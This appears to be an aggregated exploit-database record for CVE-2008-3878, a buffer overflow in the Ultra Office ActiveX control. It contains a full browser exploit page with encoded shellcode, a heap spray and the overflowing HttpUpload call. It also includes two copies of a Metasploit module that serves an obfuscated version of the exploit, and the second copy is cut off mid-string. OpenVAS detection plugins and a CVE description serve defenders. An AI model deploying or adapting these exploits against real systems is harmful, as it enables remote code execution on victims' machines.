Ultra Office ActiveX Control Remote Buffer Overflow Exploit
2008-08-27T00:00:00
ID EDB-ID:6318 Type exploitdb Reporter shinnai Modified 2008-08-27T00:00:00
Description
Ultra Office ActiveX Control Remote Buffer Overflow Exploit. CVE-2008-3878. Remote exploit for windows platform
-----------------------------------------------------------------------------
Ultra Office ActiveX Control Remote Buffer Overflow
url: http://www.ultrashareware.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<script language="JavaScript" defer>
var sCode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
var sSlide = unescape("%u9090%u9090");
var heapSA = 0x0c0c0c0c;
function tryMe()
{
var buffSize = 20000;
var x = unescape("%0c%0c%0c%0c");
while (x.length<buffSize) x += x;
x = x.substring(0,buffSize);
boom.HttpUpload(x, x, x);
}
function getsSlide(sSlide, sSlideSize)
{
while (sSlide.length*2<sSlideSize)
{
sSlide += sSlide;
}
sSlide = sSlide.substring(0,sSlideSize/2);
return (sSlide);
}
var heapBS = 0x400000;
var sizeHDM = 0x5;
var PLSize = (sCode.length * 2);
var sSlideSize = heapBS - (PLSize + sizeHDM);
var heapBlocks = (heapSA+heapBS)/heapBS;
var memory = new Array();
sSlide = getsSlide(sSlide,sSlideSize);
for (i=0;i<heapBlocks;i++)
{
memory[i] = sSlide + sCode;
}
</script>
<body onload="JavaScript: return tryMe();">
<object id="boom" classid="clsid:00989888-BB72-4E31-A7C6-5F819C24D2F7">
Unable to create object
</object>
# milw0rm.com [2008-08-27]
{"id": "EDB-ID:6318", "hash": "6fc84f318c03cea27fe1ce61a4b9a5f2", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Ultra Office ActiveX Control Remote Buffer Overflow Exploit", "description": "Ultra Office ActiveX Control Remote Buffer Overflow Exploit. CVE-2008-3878. Remote exploit for windows platform", "published": "2008-08-27T00:00:00", "modified": "2008-08-27T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/6318/", "reporter": "shinnai", "references": [], "cvelist": ["CVE-2008-3878"], "lastseen": "2016-02-01T00:37:47", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3878"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/ULTRAOFFICE_HTTPUPLOAD"]}, {"type": "openvas", "idList": ["OPENVAS:900208", "OPENVAS:1361412562310900208"]}, {"type": "exploitdb", "idList": ["EDB-ID:16513"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:86916"]}], "modified": "2016-02-01T00:37:47"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/6318/", "sourceData": "-----------------------------------------------------------------------------\n Ultra Office ActiveX Control Remote Buffer Overflow\n url: http://www.ultrashareware.com\n\n Author: shinnai\n mail: shinnai[at]autistici[dot]org\n site: http://www.shinnai.net\n\n This was written for educational purpose. Use it at your own risk.\n Author will be not responsible for any damage.\n\n Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7\n-----------------------------------------------------------------------------\n<script language=\"JavaScript\" defer>\n var sCode = unescape(\"%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800\" +\n \"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A\" +\n \"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350\" +\n \"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40\" +\n \"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000\" +\n \"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040\" +\n \"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD\" +\n \"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40\" +\n \"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18\" +\n \"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0\" +\n \"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B\" +\n \"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24\" +\n \"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9\" +\n \"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C\" +\n \"%u652E%u6578%u9000\");\n var sSlide = unescape(\"%u9090%u9090\");\n var heapSA = 0x0c0c0c0c;\n function tryMe()\n {\n var buffSize = 20000;\n var x = unescape(\"%0c%0c%0c%0c\");\n while (x.length<buffSize) x += x;\n x = x.substring(0,buffSize);\n boom.HttpUpload(x, x, x);\n }\n function getsSlide(sSlide, sSlideSize)\n {\n while (sSlide.length*2<sSlideSize)\n {\n sSlide += sSlide;\n }\n sSlide = sSlide.substring(0,sSlideSize/2);\n return (sSlide);\n }\n var heapBS = 0x400000;\n var sizeHDM = 0x5;\n var PLSize = (sCode.length * 2);\n var sSlideSize = heapBS - (PLSize + sizeHDM);\n var heapBlocks = (heapSA+heapBS)/heapBS;\n var memory = new Array();\n sSlide = getsSlide(sSlide,sSlideSize);\n for (i=0;i<heapBlocks;i++)\n {\n memory[i] = sSlide + sCode;\n }\n </script>\n <body onload=\"JavaScript: return tryMe();\">\n <object id=\"boom\" classid=\"clsid:00989888-BB72-4E31-A7C6-5F819C24D2F7\">\n Unable to create object\n </object>\n\n# milw0rm.com [2008-08-27]\n", "osvdbidlist": ["47866"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-09-29T14:26:05", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in the Ultra.OfficeControl ActiveX control in OfficeCtrl.ocx 2.0.2008.801 in Ultra Shareware Ultra Office Control allows remote attackers to execute arbitrary code via long strUrl, strFile, and strPostData parameters to the HttpUpload method.", "modified": "2017-09-28T21:31:53", "published": "2008-09-02T11:41:00", "id": "CVE-2008-3878", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3878", "title": "CVE-2008-3878", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2018-08-07T13:15:51", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow in Ultra Shareware's Office Control. When processing the 'HttpUpload' method, the arguments are concatenated together to form a command line to run a bundled version of cURL. If the command fails to run, a stack-based buffer overflow occurs when building the error message. This is due to the use of sprintf() without proper bounds checking. NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload into memory unmodified.", "modified": "2017-10-05T21:44:36", "published": "2010-03-04T06:19:37", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ULTRAOFFICE_HTTPUPLOAD", "href": "", "type": "metasploit", "title": "Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow in Ultra Shareware's Office\n Control. When processing the 'HttpUpload' method, the arguments are concatenated\n together to form a command line to run a bundled version of cURL. If the command\n fails to run, a stack-based buffer overflow occurs when building the error\n message. This is due to the use of sprintf() without proper bounds checking.\n\n NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload\n into memory unmodified.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'shinnai', 'jduck' ],\n 'References' =>\n [\n [ 'CVE', '2008-3878' ],\n [ 'OSVDB', '47866' ],\n [ 'BID', '30861' ],\n [ 'EDB', '6318' ]\n ],\n 'Payload' =>\n {\n 'Space' => 4096,\n 'BadChars' => \"\\x00\",\n # For HttpUpload args: \"\\x80\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8e\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9e\\x9f\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Tested with ActiveX v2.0.0.1020 and v2.0.2008.801\n [ 'Windows Universal',\n {\n 'Ret' => 0x0c0c0c0c # heap sprayed\n # 0x746C15A9 # p/p/r in msls31.dll\n # EEK, Safe SEH! 0x220118c2 # p/p/r in OfficeCtrl.ocx\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Aug 27 2008'))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n\n # ActiveX parameters\n progid = \"Ultra.OfficeControl\"\n clsid = \"00989888-BB72-4E31-A7C6-5F819C24D2F7\"\n\n # Set parameters\n fnname = rand_text_alpha(8+rand(8))\n arg1 = rand_text_alphanumeric(128)\n arg2 = rand_text_alphanumeric(4096) * 10\n seh_offset = 252\n\n # Build the exploit buffer\n sploit = rand_text_alphanumeric(seh_offset)\n sploit << generate_seh_record(target.ret)\n\n # Encode variables\n sploit = Rex::Text.to_hex(sploit, '%')\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n # Prepare the heap spray parameters\n spray_addr = target.ret\n spray_num = \"0x%x\" % spray_addr\n\n # Generate the final javascript\n js = %Q|\nfunction #{fnname}()\n{\ntry {\nvar obj = new ActiveXObject(\"#{progid}\");\nvar my_unescape = unescape;\nvar shellcode = '#{shellcode}';\n#{js_heap_spray}\nsprayHeap(my_unescape(shellcode), #{spray_num}, 0x40000);\nvar arg1 = my_unescape(\"#{arg1}\");\nvar arg2 = my_unescape(\"#{arg2}\");\nvar sploit = my_unescape(\"#{sploit}\");\nobj.HttpUpload(arg1, arg2, sploit);\n} catch( e ) { window.location = 'about:blank' ; }\n}\n|\n\n # Obfuscate the javascript\n opts = {\n 'Strings' => true,\n 'Symbols' => {\n 'Variables' => %w{ obj my_unescape shellcode arg1 arg2 sploit }\n }\n }\n js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)\n js.obfuscate(memory_sensitive: true)\n\n # Build the final HTML\n content = %Q|<html>\n<head>\n<script language=javascript>\n#{js}\n</script>\n</head>\n<body onload=\"#{fnname}()\">\nPlease wait...\n</body>\n</html>\n|\n\n print_status(\"Sending #{self.name}\")\n\n send_response_html(cli, content)\n\n handler(cli)\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ultraoffice_httpupload.rb"}], "openvas": [{"lastseen": "2018-09-24T18:21:48", "bulletinFamily": "scanner", "description": "This host is running Ultra Office Control, which is prone to\n multiple vulnerabilities.", "modified": "2018-09-24T00:00:00", "published": "2008-09-02T00:00:00", "id": "OPENVAS:1361412562310900208", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900208", "title": "Ultra Office ActiveX Control Multiple Vulnerabilities", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ultra_office_activex_control_mult_vuln_900208.nasl 11570 2018-09-24 11:54:11Z cfischer $\n#\n# Ultra Office ActiveX Control Multiple Vulnerabilities\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2008 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n##############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900208\");\n script_version(\"$Revision: 11570 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-24 13:54:11 +0200 (Mon, 24 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-02 07:39:00 +0200 (Tue, 02 Sep 2008)\");\n script_cve_id(\"CVE-2008-3878\");\n script_bugtraq_id(30861);\n script_copyright(\"Copyright (C) 2008 SecPod\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Denial of Service\");\n script_name(\"Ultra Office ActiveX Control Multiple Vulnerabilities\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/31632/\");\n script_xref(name:\"URL\", value:\"http://www.juniper.net/security/auto/vulnerabilities/vuln30861.html\");\n\n script_tag(name:\"summary\", value:\"This host is running Ultra Office Control, which is prone to\n multiple vulnerabilities.\");\n\n script_tag(name:\"insight\", value:\"Error exists when handling parameters received by the HttpUpload()\n and Save() methods in OfficeCtrl.ocx file.\");\n\n script_tag(name:\"affected\", value:\"Ultra Office Control 2.x and prior versions on Windows (All).\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow execution of arbitrary\n code, stack-based buffer overflow, can overwrite arbitrary files on the vulnerable system by\n tricking a user into visiting a malicious website.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_smb_func.inc\");\ninclude(\"version_func.inc\");\n\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\";\n\nforeach entry(registry_enum_keys(key:key)) {\n if(entry && \"Ultra Office Control\" >< entry) {\n appInsLoc = registry_get_sz(item:\"InstallLocation\", key:key + entry);\n if(!appInsLoc){\n exit(0);\n }\n break;\n }\n}\n\nif(!appInsLoc){\n exit(0);\n}\n\nfileVer = get_version(dllPath:appInsLoc + \"OfficeCtrl.ocx\");\nif(!fileVer){\n exit(0);\n}\n\nif(egrep(pattern:\"^([01]\\..*|2\\.0\\.[01]?[0-9]?[0-9]?[0-9]\\..*|2\\.0\\.200[0-7]\\..*|2\\.0\\.2008(\\.[0-7]?[0-9]?[0-9]|\\.80[01]))$\", string:fileVer)) {\n\n clsid = \"{00989888-BB72-4E31-A7C6-5F819C24D2F7}\";\n regKey = \"SOFTWARE\\Classes\\CLSID\\\"+ clsid;\n if(registry_key_exists(key:regKey)) {\n activeKey = \"SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\\" + clsid;\n killBit = registry_get_dword(key:activeKey, item:\"Compatibility Flags\");\n if(killBit && (int(killBit) == 1024)){\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:21", "bulletinFamily": "scanner", "description": "This host is running Ultra Office Control, which is prone to\n multiple vulnerabilities.", "modified": "2017-02-20T00:00:00", "published": "2008-09-02T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=900208", "id": "OPENVAS:900208", "title": "Ultra Office ActiveX Control Multiple Vulnerabilities", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ultra_office_activex_control_mult_vuln_900208.nasl 5370 2017-02-20 15:24:26Z cfi $\n# Description: Ultra Office ActiveX Control Multiple Vulnerabilities\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Updated By: Sooraj KS <kssooraj@secpod.com> on 2011-07-18\n# - Added null check\n#\n# Copyright:\n# Copyright (C) 2008 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n##############################################################################\n\ntag_impact = \"Successful exploitation will allow execution of arbitrary\n code, stack-based buffer overflow, can overwrite arbitrary files\n on the vulnerable system by tricking a user into visiting a\n malicious website.\n Impact Level : Application\";\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\n\nA workaround is to Set a kill bit for the CLSID {00989888-BB72-4E31-A7C6-5F819C24D2F7} \";\n\ntag_affected = \"Ultra Office Control 2.x and prior versions on Windows (All).\";\n\ntag_insight = \"Error exists when handling parameters received by the HttpUpload()\n and Save() methods in OfficeCtrl.ocx file.\";\n\n\ntag_summary = \"This host is running Ultra Office Control, which is prone to\n multiple vulnerabilities.\";\n\n\nif(description)\n{\n script_id(900208);\n script_version(\"$Revision: 5370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 16:24:26 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-02 07:39:00 +0200 (Tue, 02 Sep 2008)\");\n script_cve_id(\"CVE-2008-3878\");\n script_bugtraq_id(30861);\n script_copyright(\"Copyright (C) 2008 SecPod\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_family(\"Denial of Service\");\n script_name(\"Ultra Office ActiveX Control Multiple Vulnerabilities\");\n\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/31632/\");\n script_xref(name : \"URL\" , value : \"http://www.juniper.net/security/auto/vulnerabilities/vuln30861.html\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\n include(\"smb_nt.inc\");\n include(\"secpod_smb_func.inc\");\n\n if(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n }\n\n name = kb_smb_name();\n login = kb_smb_login();\n pass = kb_smb_password();\n domain = kb_smb_domain();\n port = kb_smb_transport();\n\n if(!port) port = 139;\n\n if(!get_port_state(port))exit(0);\n\n soc = open_sock_tcp(port);\n if(!soc){\n exit(0);\n }\n\n r = smb_session_request(soc:soc, remote:name);\n if(!r)\n {\n close(soc);\n exit(0);\n }\n\n prot = smb_neg_prot(soc:soc);\n if(!prot)\n {\n close(soc);\n exit(0);\n }\n\n r = smb_session_setup(soc:soc, login:login, password:pass,\n domain:domain, prot:prot);\n if(!r)\n {\n close(soc);\n exit(0);\n }\n\n\n uid = session_extract_uid(reply:r);\n if(!uid)\n {\n close(soc);\n exit(0);\n }\n\n r = smb_tconx(soc:soc, name:name, uid:uid, share:\"IPC$\");\n if(!r)\n {\n close(soc);\n exit(0);\n }\n\n tid = tconx_extract_tid(reply:r);\n if(!tid)\n {\n close(soc);\n exit(0);\n }\n\n r = smbntcreatex(soc:soc, uid:uid, tid:tid, name:\"\\winreg\");\n if(!r)\n {\n close(soc);\n exit(0);\n }\n\n pipe = smbntcreatex_extract_pipe(reply:r);\n if(!pipe)\n {\n close(soc);\n exit(0);\n }\n\n r = pipe_accessible_registry(soc:soc, uid:uid, tid:tid, pipe:pipe);\n if(!r)\n {\n close(soc);\n exit(0);\n }\n\n handle = registry_open_hklm(soc:soc, uid:uid, tid:tid, pipe:pipe);\n if(!handle)\n {\n close(soc);\n exit(0);\n }\n\n key = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\";\n key_h = registry_get_key(soc:soc, uid:uid, tid:tid, pipe:pipe,\n key:key, reply:handle);\n if(!key_h)\n {\n close(soc);\n exit(0);\n }\n\n # To get application installed Path.\n enumKeys = registry_enum_key(soc:soc, uid:uid, tid:tid, pipe:pipe, reply:key_h);\n close(soc);\n\n foreach entry (enumKeys)\n {\n if(\"Ultra Office Control\" >< entry)\n {\n appInsLoc = registry_get_sz(item:\"InstallLocation\", key:key + entry);\n if(!appInsLoc){\n exit(0);\n }\n\t\tbreak;\n }\n }\n\n if(!appInsLoc){\n exit(0);\n }\n\n # To Get File Version.\n share = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:appInsLoc);\n file = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\",\n string:appInsLoc + \"OfficeCtrl.ocx\");\n\n soc = open_sock_tcp(port);\n if(!soc){\n exit(0);\n }\n\n r = smb_session_request(soc:soc, remote:name);\n if(!r)\n {\n close(soc);\n exit(0);\n }\n\n prot = smb_neg_prot(soc:soc);\n if(!prot)\n {\n close(soc);\n exit(0);\n }\n\n r = smb_session_setup(soc:soc, login:login, password:pass, domain:domain, prot:prot);\n if(!r)\n {\n close(soc);\n exit(0);\n }\n\n uid = session_extract_uid(reply:r);\n r = smb_tconx(soc:soc, name:name, uid:uid, share:share);\n\n tid = tconx_extract_tid(reply:r);\n if(!tid)\n {\n close(soc);\n exit(0);\n }\n\n fid = OpenAndX(socket:soc, uid:uid, tid:tid, file:file);\n if(!fid)\n {\n close(soc);\n\texit(0);\n }\n\n fileVer = GetVersion(socket:soc, uid:uid, tid:tid, fid:fid);\n close(soc);\n\n if(!fileVer){\n\texit(0);\n }\n\n # Grep for Version <= 2.0.2008.801 \n if(egrep(pattern:\"^([01]\\..*|2\\.0\\.[01]?[0-9]?[0-9]?[0-9]\\..*|2\\.0\\.200[0-7]\" +\n\t\t \"\\..*|2\\.0\\.2008(\\.[0-7]?[0-9]?[0-9]|\\.80[01]))$\", string:fileVer))\n {\n clsid = \"{00989888-BB72-4E31-A7C6-5F819C24D2F7}\";\n regKey = \"SOFTWARE\\Classes\\CLSID\\\"+ clsid;\n if(registry_key_exists(key:regKey))\n {\n # Check for Kill-Bit set for ActiveX control\n activeKey = \"SOFTWARE\\Microsoft\\Internet Explorer\\\"+\n \"ActiveX Compatibility\\\" + clsid;\n killBit = registry_get_dword(key:activeKey,\n \t\t item:\"Compatibility Flags\");\n if(killBit && (int(killBit) == 1024)){\n exit(0);\n }\n security_message(0); \n }\n }\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T00:02:15", "bulletinFamily": "exploit", "description": "Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow. CVE-2008-3878. Remote exploit for windows platform", "modified": "2010-09-20T00:00:00", "published": "2010-09-20T00:00:00", "id": "EDB-ID:16513", "href": "https://www.exploit-db.com/exploits/16513/", "type": "exploitdb", "title": "Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow", "sourceData": "##\r\n# $Id: ultraoffice_httpupload.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack-based buffer overflow in Ultra Shareware's Office\r\n\t\t\t\tControl. When processing the 'HttpUpload' method, the arguments are concatenated\r\n\t\t\t\ttogether to form a command line to run a bundled version of cURL. If the command\r\n\t\t\t\tfails to run, a stack-based buffer overflow occurs when building the error\r\n\t\t\t\tmessage. This is due to the use of sprintf() without proper bounds checking.\r\n\r\n\t\t\t\tNOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload\r\n\t\t\t\tinto memory unmodified.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'shinnai', 'jduck' ],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2008-3878' ],\r\n\t\t\t\t\t[ 'OSVDB', '47866' ],\r\n\t\t\t\t\t[ 'BID', '30861' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.exploit-db.com/exploits/6318' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 4096,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t# For HttpUpload args: \"\\x80\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8e\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9e\\x9f\",\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Tested with ActiveX v2.0.0.1020 and v2.0.2008.801\r\n\t\t\t\t\t[ 'Windows Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x0c0c0c0c # heap sprayed\r\n\t\t\t\t\t\t\t# 0x746C15A9 # p/p/r in msls31.dll\r\n\t\t\t\t\t\t\t# EEK, Safe SEH! 0x220118c2 # p/p/r in OfficeCtrl.ocx\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Aug 27 2008'))\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\t# ActiveX parameters\r\n\t\tprogid = \"Ultra.OfficeControl\"\r\n\t\tclsid = \"00989888-BB72-4E31-A7C6-5F819C24D2F7\"\r\n\r\n\t\t# Set parameters\r\n\t\tfnname = rand_text_alpha(8+rand(8))\r\n\t\targ1 = rand_text_alphanumeric(128)\r\n\t\targ2 = rand_text_alphanumeric(4096) * 